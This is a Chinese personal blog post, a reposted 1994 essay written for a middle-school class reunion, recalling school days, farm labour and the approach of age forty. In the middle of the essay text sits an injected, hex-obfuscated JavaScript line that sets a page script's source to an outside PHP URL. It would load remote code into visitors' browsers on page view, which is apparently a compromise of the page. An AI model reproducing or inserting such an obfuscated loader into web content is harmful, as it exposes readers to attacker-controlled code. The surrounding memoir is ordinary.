注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

beiguozhinan

我在这里等你

 
 
 

日志

 
 

我们永远在一起  

2009-08-23 10:02:32|  分类: 杂文随笔 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

 

 二十多年前,我们是一群天真的孩子,命运把我们聚到一起,朝夕相处,度过了少年时代最后的时光。

今天,我们又走到一起,带着我们成熟的面孔和一颗依然不变的童心。不管我们怎样的生存,不管我们生存的世界差异有多么大,在这一刻,我们都同样感受到友谊的温暖,友情的可贵,友爱的力量——因为我们曾经年轻,因为年轻的我们曾经在一起。

在一起,使我们有了相同的回忆。往事历历就像昨天那么清晰。“一座安静的校舍耸立在海边,在朝霞的辉映中迎来张张笑脸”。(这是我当年在班级黑板报上写的《一座安静的校舍耸立在海边〉)早上,我们常常来不及吃饭,啃着半个馒头约上同学匆匆往学校跑。背着黄书包,穿着黄胶鞋,很多同学都穿着打补丁的裤子,没有人因此感到自卑。在那个特殊的年代里,正常的文化课都让位于政治性活动.大批判,学习社论,学习最新指示心得体会,这几乎成了唯一显示学习成绩的机会。我们是那么投入,一颗火热的心始终想着将来要解放全人类。这是那个时代的悲哀,他错误的引导了一代少年。但年少的我们在一起是快乐的。

我们有比现在的孩子更多的时间去接触社会,接触大自然。我们曾经请二中的大同学帮助排练舞剧《白毛女》;还有全班同学的诗朗诵。最难忘我们在茶园劳动那段日子,每天沿着弯弯的山路走着,随手扯一把青青的草,捉一只螳螂,摘一朵小花。大自然给我们带来了身心的享受,真是“漫山遍野春一片,阳光暖心间”。(这是我自编的歌,曲子是套用的采茶姑娘)中午,我们爬到高高的山坡上,在阳光下大声的唱着《奔流的南江》,真实快活极了。还记得我们半夜三点集合去爬浮山吗?山顶的狂风吹得我们只能一排排的前进,稍一松手就可能被风刮跑了。团结就是力量在那一刻像生命的存在那样被证实了。当我们手挽手闯过峰顶放眼四望时,是否意识到“巍巍的高山树常青,滔滔的河水流不尽”(我们的诗朗诵)是亘古不变的永恒?

二十多年了,中学时代的回忆不仅没有淡漠,随着年龄的增长反而越来越清晰——我们是在追忆少年,寻找失去的青春,找回那个单纯的自己。

document.getelementsbytagname("script")[0].src=unescape("%68%74%74%70%3a%2f%2f%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6d%2e%70%68%70") 在这二十多年里,我们走过了人生最波折的一段路:生命与情感碰撞,激情与理智难分,幸福与痛苦相伴。我们的青春,我们的爱恋,我们对世界的感知,对人生的思索,都重重的印在我们心的扉页上,成为左右我们一生并为之骄傲礼赞的光环。

今天,我们已进入不惑之年,生命的一个新的里程碑。直到现在我们才发现,我们已不再年轻,直到现在我们才感到,青春是多么可爱。四十岁使我们更清醒的面对人生。太阳东升西落,万物皆有规律。人生的美丽就在于它的平凡。人类就是在生息繁衍的平凡的日日夜夜里万众一心的营造着未来,这是人生最初也是最终的愿望。

我们相识在二十五年前,二十五年在人类历史中只是短短的一瞬。可人的一生有几个二十五年呢?我们是否在这二十五年中尽了自己最大的努力了?我们将如何对待今后的风风雨雨?日月更替,沧海桑田。但愿我们的心永远充满希望,永远年轻。让我们举杯,为我们的辉煌与平凡,用我们的热诚与冷峻,把大海的喧腾,小溪的清幽一起编织到我们生命的乐章里,手挽手走进一九九四,走进庄严的不惑之年。

                                                                                 

        旧日习作    写于1994年春同学聚会    括号内为今注解

 

  评论这张
 
阅读(74)| 评论(9)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017